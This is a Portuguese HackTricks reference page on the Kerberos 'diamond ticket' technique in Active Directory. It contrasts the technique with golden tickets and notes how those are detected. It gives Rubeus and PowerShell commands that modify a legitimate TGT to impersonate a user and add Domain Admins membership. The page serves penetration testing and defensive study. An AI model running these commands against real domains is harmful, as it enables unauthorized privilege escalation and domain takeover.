hacktricks/windows-hardening/active-directory-methodology/diamond-ticket.md

4.2 KiB

Diamond Ticket

Aprenda hacking no AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras formas de apoiar o HackTricks:

Diamond Ticket

Como um golden ticket, um diamond ticket é um TGT que pode ser usado para acessar qualquer serviço como qualquer usuário. Um golden ticket é forjado completamente offline, criptografado com o hash krbtgt daquele domínio e, em seguida, inserido em uma sessão de logon para uso. Como os controladores de domínio não rastreiam TGTs que eles (ou elas) emitiram legitimamente, eles aceitarão felizmente TGTs que estão criptografados com seu próprio hash krbtgt.

Existem duas técnicas comuns para detectar o uso de golden tickets:

  • Procurar por TGS-REQs que não têm um AS-REQ correspondente.
  • Procurar por TGTs que têm valores absurdos, como a validade padrão de 10 anos do Mimikatz.

Um diamond ticket é feito modificando os campos de um TGT legítimo que foi emitido por um DC. Isso é alcançado solicitando um TGT, descriptografando com o hash krbtgt do domínio, modificando os campos desejados do ticket e, em seguida, recriptografando. Isso supera as duas desvantagens mencionadas anteriormente de um golden ticket porque:

  • TGS-REQs terão um AS-REQ precedente.
  • O TGT foi emitido por um DC, o que significa que terá todos os detalhes corretos da política Kerberos do domínio. Embora esses possam ser forjados com precisão em um golden ticket, é mais complexo e sujeito a erros.
# Get user RID
powershell Get-DomainUser -Identity <username> -Properties objectsid

.\Rubeus.exe diamond /tgtdeleg /ticketuser:<username> /ticketuserid:<RID of username> /groups:512

# /tgtdeleg uses the Kerberos GSS-API to obtain a useable TGT for the user without needing to know their password, NTLM/AES hash, or elevation on the host.
# /ticketuser is the username of the principal to impersonate.
# /ticketuserid is the domain RID of that principal.
# /groups are the desired group RIDs (512 being Domain Admins).
# /krbkey is the krbtgt AES256 hash.
<details>

<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras formas de apoiar o HackTricks:

* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>